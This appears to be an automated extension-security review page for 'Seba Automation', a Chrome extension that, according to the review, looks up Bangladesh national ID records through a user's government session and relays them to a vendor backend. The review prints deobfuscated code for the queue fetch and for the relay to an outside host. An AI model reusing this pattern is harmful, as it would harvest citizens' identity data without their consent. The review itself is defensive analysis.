Is সনদ:: ইউনিয়ন পরিষদ পৌরসভা এবং সিটি কর্পোরেশনের সকল সনদ এক ঠিকানায় safe?

Medium risk

This extension looks up Bangladesh government NID records on dwavwb.gov.bd and forwards the results to its own paid backend.

On the government's dwavwb.gov.bd certificate site, the extension injects a panel that queries a queue of NID (national ID) and date-of-birth pairs from the vendor's own backend, then uses the visitor's logged-in government session to look each one up against the official NID verification endpoint. The returned identity record is sent to the vendor's server (api.rajabariup.gov.bd) rather than staying on government infrastructure or the local device, and this lookup capability is metered behind a paid account balance.

Seba Automationv0.0.20Chrome Web Store
45Risk
Who publishes it

Seba Automation - 2 other listings from the same operator, 2 of them carrying a finding

What this publisher told the store about itself, and the other listings that told it the same thing.

Publisher
Seba Automation

Same store account

2 other listings published from this account, 2k+ users between them. 2 of them carry a finding.

AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.

Publishers can request a review.

Findings

SeverityHIGH
ClassUNWANTED
TypeUnexpected
CWECWE-359
SourceAI FOUND

Extension relays Bangladesh govt NID lookups to a paid vendor backend

Code analysis shows a content script queries Bangladesh's official NID verification site for citizens queued by the vendor, then forwards the full government record to the vendor's own paid backend.

01EvidenceCAUSE EFFECT
What actually happens
You did this

You click Verify in the panel the extension injects on a Bangladesh government VGD application page.

The extension did this

It fetches queued NID and DOB pairs from the vendor's server, looks each up on the government's own endpoint, then sends the answer to the vendor's paid backend.

02EvidenceFIELD TABLE
Data relayed for each queued applicant
FieldValueWhy it matters
National ID number
1994847583920Bangladesh's national identity number for the citizen being looked up.
Date of birth
1994-03-12Paired with the NID to run the lookup and match the government's record.
Full government NID record
(illustrative) {"name":"Rahim Uddin","dob":"1994-03-12","address":"Rajshahi"}The citizen's identity data the government returns, forwarded whole to the vendor's server.
Applicant record ID
8821An internal ID from the vendor's queue tying the lookup to one applicant.
03EvidenceCODE COMPARE
The code that does this

The queue-fetch and NID-lookup-relay functions

What it actually does
Queue fetch, renamed
// eb(): pull the queue of NID+DOB pairs awaiting lookup
const fetchUnverifiedQueue = async () => {
  const records = await callApiWithAuth(
    "https://api.rajabariup.gov.bd/api/auth/dwavwb/unverified", "GET"
  );
  for (const record of records) {
    if (record.id && record.identificationNumber && record.date_of_birth) {
      await lookupAndRelay(record);
      await sleep(2000); // 2s throttle between lookups
    }
  }
};
Lookup + relay, renamed
// ey(): look up one NID+DOB pair on the government's own endpoint,
// then forward the full government response to the vendor's backend
const lookupAndRelay = async (record) => {
  const govUrl = `https://dwavwb.gov.bd/icvgd/get-nid-data?nid=${record.identificationNumber}&dob=${record.date_of_birth}`;
  const govResponse = await fetch(govUrl, { method: "GET" });
  const govData = await govResponse.json();

  if (govData && govData.nidData) {
    await callApiWithAuth(
      `https://api.rajabariup.gov.bd/api/auth/dwavwb/verify/${record.id}`,
      "POST",
      { payload: govData.nidData, id: record.id },
      { "X-Submission-Type": "vgd-form" }
    );
  }
};
04EvidenceTHIRD PARTY LIST
Where the lookup and the data end up
  • dwavwb.gov.bd

    Official Bangladesh government NID verification site, queried using your own logged-in session; not operated by this extension's vendor.

  • api.rajabariup.gov.bd

    The extension vendor's own paid backend. Supplies the NID+DOB queue and receives the government's full identity record, gated behind a metered account balance.

05EvidencePLAIN NOTE
Who chooses which citizens get looked up

The NID and DOB pairs looked up come from the vendor's own queue, not typed by this extension's user, who cannot see or limit which citizens are queried. This may reflect a local digital-service-center business model with consent.

06EvidencePLAIN NOTE
Observation

Static analysis finding. This behaviour was identified by reading the shipped extension code and has not yet been reproduced in a live run. The trigger conditions and the exact data sent are read from the code, not from an observed capture.

What it can do

Permissions this extension asks for, as declared in version 0.0.20. Asking for a permission is not a finding on its own - it is what the extension can do if it chooses to.

  • Read and change your data on every site you visit

    *://*/*

  • Store data in your browser

    storage

  • See the address and title of every tab you have open

    tabs

  • Act on the current tab, but only after you click the extension

    activeTab

  • Run its own code inside the pages you visit

    scripting

Where it sends data

Destinations our analysis observed সনদ:: ইউনিয়ন পরিষদ পৌরসভা এবং সিটি কর্পোরেশনের সকল সনদ এক ঠিকানায় contacting. Sending data somewhere is not a finding on its own - an extension that syncs your settings has to talk to its own server - but it is where your data can go, and who else it goes to.

  • api.rajabariup.gov.bd

    সনদ:: ইউনিয়ন পরিষদ পৌরসভা এবং সিটি কর্পোরেশনের সকল সনদ এক ঠিকানায় sends data to api.rajabariup.gov.bd. No other extension we have analysed sends data here.

Updated 30 September 2026lcodpbcjcnokeamonhlpfagbbchgfjap